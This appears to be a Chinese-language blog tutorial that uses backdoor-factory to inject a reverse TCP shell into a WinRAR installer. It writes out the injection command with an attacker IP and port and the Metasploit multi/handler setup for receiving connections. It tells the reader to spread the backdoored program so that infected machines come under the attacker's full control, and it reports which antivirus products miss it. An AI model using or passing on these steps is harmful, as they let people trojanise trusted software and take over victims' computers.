天天看點

後門

我們的網絡不安全

https://www.youtube.com/watch?v=nJF9OTscFiQ

這次我們用到的程式叫backdoor-factory,為完整的程式注入後門程式。具體的請網上檢視。

在kali linux系統上內建了該程式,但是注入後的程式顯示為空檔案(大小為0).故在ubuntu上手動安裝嘗試了一下,看我們的網絡是否夠安全。

注入

1.下載下傳程式

git clone https://github.com/secretsquirrel/the-backdoor-factory.git
           

2.安裝

sudo chmod +x ./install.sh
           

3.運作

sudo ./backdoor.py
           

4.選擇目标檔案

本次使用的軟體為 https://rarlab.com/rar/winrar-x64-561.exe

之後将在此程式中注入後門

執行

./babackdoor.py -f winrar-x64-561.exe -S

可以看到此程式支援代碼注入

./babackdoor.py -f winrar-x64-561.exe -s show

檢視支援哪幾種注入方式

5.開始注入

./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234

reverse_shell_tcp_inline 注入方式

172.17.170.38 攻擊者ip,之後受害者主機來通路該ip

1234 攻擊者端口,之後受害者主機來通路該端口

選擇注入的位置:

都可以,這裡我們選擇2

完成。可以在指定目錄下找到該檔案。

到這裡就注入完成了。

控制

伺服器等待中招的pc連接配接。

設定伺服器。打開kali linux系統。

#msfconsole
msf> use multi/handler
msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set LHOST 172.17.170.38
msf exploit(handler) > exploit
           

将注入好的程式散發出去。如果有計算機不幸中招。

當有中招的pc代開注入後門的程式後,伺服器端會有響應。

可以看到172.17.172.223連入伺服器。這時候,你就可以全權控制223這台主機了。

可以看到被控制的主機資訊。(編碼格式可能不對,出現亂碼)

測試

對于注入後門程式的程式,會不會成功被檢測到呢。我用的火絨殺毒,輕按兩下之後立馬報警。

對于其他防毒軟體看看什麼情況,可以看到能夠清除到此後門的防毒軟體并不多。

實際上,該程式官網下載下傳的源檔案也可能會被誤殺

殺毒可以參考網站:

http://www.virscan.org/language/zh-cn/

https://www.virustotal.com/zh-cn/

參考

利用BDF向EXE檔案植入後門

Backdoor factory – How to inject shell-code into windows application

Kali Linux 滲透測試 部落格記錄